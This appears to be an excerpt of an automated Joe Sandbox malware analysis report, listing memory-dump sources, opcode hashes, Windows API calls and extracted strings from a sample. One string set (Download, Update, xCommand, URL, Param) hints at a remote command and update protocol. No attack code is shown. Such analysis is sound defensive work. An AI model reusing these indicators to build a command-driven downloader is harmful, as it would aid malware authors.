                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 522efa4cf538315d46ba45074545b7bb34d7d534754fa276639324e78a1233da
                                                • Instruction ID: 96db7f6bb9e48ca15a925a6da673b516e66383ea4ad77f523ad0af2d6b816fa0
                                                • Opcode Fuzzy Hash: 522efa4cf538315d46ba45074545b7bb34d7d534754fa276639324e78a1233da
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc090e626f5abbcfa577b3832add54e5e18a4b6c8a6473e520f7e323632e9d46
                                                • Instruction ID: d5a3c1eeea24ff5922e4f0847014e706afb1ac71b4117863ac0101192175257a
                                                • Opcode Fuzzy Hash: dc090e626f5abbcfa577b3832add54e5e18a4b6c8a6473e520f7e323632e9d46
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93aeb139fc75136d584516547ec90c1a7201cbf88b337d3a611b2aa4c5a34d86
                                                • Instruction ID: 5dcfd9161acb356cc535644a779726bed78277c0aa3eb3982b114540ff60a218
                                                • Opcode Fuzzy Hash: 93aeb139fc75136d584516547ec90c1a7201cbf88b337d3a611b2aa4c5a34d86
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29891e85c5f3be88c70317cc553adcba21669944b23ad51ab0aeb2c42974d72e
                                                • Instruction ID: 16cf8f90f87d031daeee758085555acdeb24783270cf672fe8c65465cb1e3e53
                                                • Opcode Fuzzy Hash: 29891e85c5f3be88c70317cc553adcba21669944b23ad51ab0aeb2c42974d72e
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7da555d45efa8af55388d6c3d378d3354ddb8fdd70bbfaf95c55e775d0a28dca
                                                • Instruction ID: 10c550fbd9229cf96c1dff6d9bab156985bf26377095e280a6ce7cfe4320d296
                                                • Opcode Fuzzy Hash: 7da555d45efa8af55388d6c3d378d3354ddb8fdd70bbfaf95c55e775d0a28dca
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26730b660d2e304f597c8855c3d2771eb9d86c2cde1ca231b07fac8d22a6b77a
                                                • Instruction ID: d85bd8c83f656e9ca1ce39787ea6acaeb766ff16fe5877427c6a4cf4fbba7f06
                                                • Opcode Fuzzy Hash: 26730b660d2e304f597c8855c3d2771eb9d86c2cde1ca231b07fac8d22a6b77a
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3053371c1264d650bb4c0ab1ea0bdf64f679a26ec0b4049b6fd14da669291a79
                                                • Instruction ID: c9e8a8959ff50ed1cf533c8c030bcdeb7e2f4d9a253fe06341b4882825ff28c2
                                                • Opcode Fuzzy Hash: 3053371c1264d650bb4c0ab1ea0bdf64f679a26ec0b4049b6fd14da669291a79
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe3c0b30eb8d94b5da75ef3d734b5dbaa9252c58547207e5828762b18541faf1
                                                • Instruction ID: 6e63ef74f6021bb875867478ba44279e30092e59f9403e3a79eb83d4b789ca96
                                                • Opcode Fuzzy Hash: fe3c0b30eb8d94b5da75ef3d734b5dbaa9252c58547207e5828762b18541faf1
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f75f6d149c6789c964d1eba893abd607f6f0fcca0baf76df3ae8239d7ff8465
                                                • Instruction ID: 6593d0d2c5766726df453f2bfe949c33b9b45748d78c145b5bf39ef0d4837f61
                                                • Opcode Fuzzy Hash: 6f75f6d149c6789c964d1eba893abd607f6f0fcca0baf76df3ae8239d7ff8465
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a49a0691703c825fc15a2a0bb35a15769c0aa0e1e461a8bd70d4a81ecc60781
                                                • Instruction ID: 1ecba99e51b79f2e4b5fe16431abe604f430e5eab2203afeb81f295f9a9c067c
                                                • Opcode Fuzzy Hash: 7a49a0691703c825fc15a2a0bb35a15769c0aa0e1e461a8bd70d4a81ecc60781
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1542c20f5a946d28757e67d81836a07ea8bfb4e72852dc3d74953d00abfe9493
                                                • Instruction ID: af97d66baa926c4f3b8f2d6a71a23bf1c0bdeb5c1116af93e0ce12bc0038bf95
                                                • Opcode Fuzzy Hash: 1542c20f5a946d28757e67d81836a07ea8bfb4e72852dc3d74953d00abfe9493
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 712a3c41954c8da71f6cdc63798a3ec9dfa2106d307f6f6a6e59cf255c2a0253
                                                • Instruction ID: a4ddb001f86246ba3252c09486fca5b38db6262908142a2763978cf5694168f1
                                                • Opcode Fuzzy Hash: 712a3c41954c8da71f6cdc63798a3ec9dfa2106d307f6f6a6e59cf255c2a0253
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a05fe18d94f5f66407e50e0e4ce595f45842f7cd5006ce385dce1f8a05b0d1e
                                                • Instruction ID: ebd370688337e4557e15acfda9d3f2c1353b0170eab303a38c3b67467cc77620
                                                • Opcode Fuzzy Hash: 5a05fe18d94f5f66407e50e0e4ce595f45842f7cd5006ce385dce1f8a05b0d1e
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c782202e52284e1f6a4b85a868a9c5ef52240ae23a1a723c8afd627de1e4976
                                                • Instruction ID: 08b6d35e115b65ed0b7768c02b28806b0881dce5eecf8bd622fcb9f2c166de00
                                                • Opcode Fuzzy Hash: 7c782202e52284e1f6a4b85a868a9c5ef52240ae23a1a723c8afd627de1e4976
                                                • Instruction Fuzzy Hash:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 042bf4bc140b9be748272c86524181631b1c4e9709d7cfcd25339302dd75a0e4
                                                • Instruction ID: 56f33b490e515c1991850dd86d6e67e063f42b303bda0fae1f6c30a8309d5876
                                                • Opcode Fuzzy Hash: 042bf4bc140b9be748272c86524181631b1c4e9709d7cfcd25339302dd75a0e4
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 00430E9D
                                                  • Part of subcall function 00430E68: GetProcAddress.KERNEL32(00000000), ref: 00430E81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                • API String ID: 1646373207-1918263038
                                                • Opcode ID: 07f03f934f66e97b2c45f9c5f993f71570d5753330354a292757c734cf32809f
                                                • Instruction ID: 5ce11bf3dff7dcbac6806bf9111ba2700e275f1f76bf181bd05fd63e8e9933b9
                                                • Opcode Fuzzy Hash: 07f03f934f66e97b2c45f9c5f993f71570d5753330354a292757c734cf32809f
                                                • Instruction Fuzzy Hash: 6C41426268434C5B2744676E75224677BDCD25CB00FA0F72FF004CBBA5CB3DA8459A2D
                                                APIs
                                                • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00428E78
                                                • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00428E84
                                                • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00428E93
                                                • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00428E9F
                                                • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00428EB7
                                                • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00428EDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                • API String ID: 1416857345-3736581797
                                                • Opcode ID: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                • Instruction ID: 0f80b1c64b84514455e222d2f54a119e3207b81848e91510e66230f79eecabad
                                                • Opcode Fuzzy Hash: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                • Instruction Fuzzy Hash: 20110A70302325AFE7109F65EC42B6FB7A9EF55710FA1402FF940DB281DEB859408BA8
                                                APIs
                                                • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00428E78
                                                • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00428E84
                                                • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00428E93
                                                • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00428E9F
                                                • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00428EB7
                                                • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00428EDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                • API String ID: 1416857345-3736581797
                                                • Opcode ID: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                • Instruction ID: 0f80b1c64b84514455e222d2f54a119e3207b81848e91510e66230f79eecabad
                                                • Opcode Fuzzy Hash: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                • Instruction Fuzzy Hash: 20110A70302325AFE7109F65EC42B6FB7A9EF55710FA1402FF940DB281DEB859408BA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                • API String ID: 0-954089795
                                                • Opcode ID: 1181e68c7420e5035b17eaba7e5189add56abfe16e2305f94e673cf54d2d3152
                                                • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                • Opcode Fuzzy Hash: 1181e68c7420e5035b17eaba7e5189add56abfe16e2305f94e673cf54d2d3152
                                                • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                APIs
                                                • GetThreadLocale.KERNEL32(00000000,0042FB77,?,?,00000000,00000000), ref: 0042F8E2
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                • API String ID: 4232894706-2493093252
                                                • Opcode ID: b85ed9dfc967aef72133f11f1de50f4a52934c066246e20b852cc72a297c83f8
                                                • Instruction ID: 197d17d46539fea116ba07fa9f83ce9cdf8d1f815eb4acb174e747f36b05566f
                                                • Opcode Fuzzy Hash: b85ed9dfc967aef72133f11f1de50f4a52934c066246e20b852cc72a297c83f8
                                                • Instruction Fuzzy Hash: B1617F30B001289BDB00EBB9FD516DE7AB6AB88304FD1907BB101DB346DA3DD949975D
                                                APIs
                                                • GetThreadLocale.KERNEL32(00000000,0042FB77,?,?,00000000,00000000), ref: 0042F8E2
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                • API String ID: 4232894706-2493093252
                                                • Opcode ID: 79201f3f7c0f6db5aab56cbcec8dbd302e1c5a467d6b75af3be145713cf87dc5
                                                • Instruction ID: 197d17d46539fea116ba07fa9f83ce9cdf8d1f815eb4acb174e747f36b05566f
                                                • Opcode Fuzzy Hash: 79201f3f7c0f6db5aab56cbcec8dbd302e1c5a467d6b75af3be145713cf87dc5
                                                • Instruction Fuzzy Hash: B1617F30B001289BDB00EBB9FD516DE7AB6AB88304FD1907BB101DB346DA3DD949975D
                                                APIs
                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004321ED
                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00432209
                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00432242
                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004322CE
                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004322ED
                                                • VariantCopy.OLEAUT32(?), ref: 00432322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                • String ID:
                                                • API String ID: 351091851-3916222277
                                                • Opcode ID: 287d018db1ed06f337db09492564644d5890f8cdaa2b2e6e0ed5f9d3aff5ee10
                                                • Instruction ID: 5b189e654ec2a164cf08ff3fe1fa5bda42d96994a9381aa440632436457c8679
                                                • Opcode Fuzzy Hash: 287d018db1ed06f337db09492564644d5890f8cdaa2b2e6e0ed5f9d3aff5ee10
                                                • Instruction Fuzzy Hash: 62510F75A0021D9BCB22DB59CD81BDAB3FCAF4C304F0051DAE609E7211D678AF858F68
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252BD
                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252C3
                                                • GetStdHandle.KERNEL32(000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252D8
                                                • WriteFile.KERNEL32(00000000,000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252DE
                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004252FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileHandleWrite$Message
                                                • String ID: Error$Runtime error at 00000000
                                                • API String ID: 1570097196-2970929446
                                                • Opcode ID: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                • Instruction ID: bba3c48ee625c544525bb5478dd2fe844e83fda31baf9900a2c834fa5eb47d56
                                                • Opcode Fuzzy Hash: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                • Instruction Fuzzy Hash: D6F0F660B80B20B5EA20B3A47E0AF9E2E585714B14F90538BB160940E2CAFE54C8D639
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252BD
                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252C3
                                                • GetStdHandle.KERNEL32(000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252D8
                                                • WriteFile.KERNEL32(00000000,000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252DE
                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004252FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileHandleWrite$Message
                                                • String ID: Error$Runtime error at 00000000
                                                • API String ID: 1570097196-2970929446
                                                • Opcode ID: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                • Instruction ID: bba3c48ee625c544525bb5478dd2fe844e83fda31baf9900a2c834fa5eb47d56
                                                • Opcode Fuzzy Hash: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                • Instruction Fuzzy Hash: D6F0F660B80B20B5EA20B3A47E0AF9E2E585714B14F90538BB160940E2CAFE54C8D639
                                                APIs
                                                  • Part of subcall function 0042E498: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                  • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                  • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                  • Part of subcall function 0042E498: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
